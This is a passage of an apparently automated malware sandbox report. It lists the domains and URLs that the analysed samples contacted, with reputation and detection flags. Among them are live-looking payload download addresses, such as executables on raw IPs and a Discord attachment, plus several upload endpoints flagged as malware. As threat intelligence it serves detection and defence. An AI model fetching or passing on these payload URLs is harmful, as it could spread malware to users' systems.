                      http://tempuri.org/Entity/Id130%URL Reputationsafe
                      http://tempuri.org/Entity/Id140%URL Reputationsafe
                      http://tempuri.org/Entity/Id150%URL Reputationsafe
                      http://tempuri.org/Entity/Id160%URL Reputationsafe
                      http://tempuri.org/Entity/Id170%URL Reputationsafe
                      http://tempuri.org/Entity/Id180%URL Reputationsafe
                      http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id190%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      bastinscustomfab.com
                      50.62.140.96
                      truetrueunknown
                      cdn.discordapp.com
                      162.159.134.233
                      truefalse
                        high
                        rcacademy.at
                        211.59.14.90
                        truetrueunknown
                        www.bastinscustomfab.com
                        unknown
                        unknowntrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://45.9.20.240:7769/Igno.exetrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://e-lanpengeonline.com/upload/true
                        • Avira URL Cloud: safe
                        unknown
                        http://185.112.83.8/InjectHollowing.bintrue
                        • Avira URL Cloud: safe
                        unknown
                        https://bastinscustomfab.com/veldolore/scc.exefalse
                        • Avira URL Cloud: safe
                        unknown
                        https://cdn.discordapp.com/attachments/921473641538027521/921473810035793960/Vorticism.exefalse
                          high
                          http://185.112.83.8/install3.exetrue
                          • Avira URL Cloud: malware
                          unknown
                          http://galala.ru/upload/true
                          • Avira URL Cloud: malware
                          unknown
                          http://witra.ru/upload/true
                          • Avira URL Cloud: malware
                          unknown
                          https://www.bastinscustomfab.com/veldolore/scc.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          http://rcacademy.at/upload/true
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2005/02/sc/sctDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                              high
                              https://duckduckgo.com/chrome_newtabDB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpfalse
                                high
                                http://service.rDB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpfalse
                                    high
                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                      high
                                      http://tempuri.org/Entity/Id12Response4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://tempuri.org/4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://tempuri.org/Entity/Id2Response4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                        high
                                        http://tempuri.org/Entity/Id21ResponseDB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                          high
                                          http://tempuri.org/Entity/Id9DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                            high
                                            http://tempuri.org/Entity/Id8DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://tempuri.org/Entity/Id5DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                              high
                                              http://tempuri.org/Entity/Id4DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://tempuri.org/Entity/Id7DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://tempuri.org/Entity/Id6DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                high
                                                https://support.google.com/chrome/?p=plugin_realDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://tempuri.org/Entity/Id19ResponseDB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.interoperabilitybridges.com/wmp-extension-for-chromeDB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceDB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://support.google.com/chrome/?p=plugin_pdfDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/faultDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsatDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://tempuri.org/Entity/Id15Response4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://forms.real.com/real/realone/download.html?type=rpsp_usDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://support.aDB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/Entity/Id6ResponseDB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.372654179.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.403688528.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.389556354.000000000095C000.00000004.00000020.sdmpfalse
                                                                              high
                                                                              https://api.ip.sb/ipDB56.exe, 00000011.00000002.532354864.0000000003D61000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.617991454.0000000000402000.00000040.00000001.sdmp, 4924.exe, 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.625266789.0000000002610000.00000004.00020000.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://support.google.com/chrome/?p=plugin_quicktimeDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/04/scDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://tempuri.org/Entity/Id9ResponseDB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://tempuri.org/Entity/Id20DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://tempuri.org/Entity/Id21DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://tempuri.org/Entity/Id22DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            http://tempuri.org/Entity/Id23DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://nsis.sf.net/NSIS_ErrorError8CE5.exe.5.drfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://tempuri.org/Entity/Id24DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://tempuri.org/Entity/Id24ResponseDB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://tempuri.org/Entity/Id1Response4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedDB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingDB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://support.google.com/chrome/?p=plugin_shockwaveDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://forms.reaDB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/trustDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://tempuri.org/Entity/Id10DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://tempuri.org/Entity/Id11DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://tempuri.org/Entity/Id12DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://tempuri.org/Entity/Id16ResponseDB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://tempuri.org/Entity/Id13DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id14DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631215292.0000000002C4B000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id15DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://tempuri.org/Entity/Id16DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/NonceDB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://tempuri.org/Entity/Id17DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://tempuri.org/Entity/Id18DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
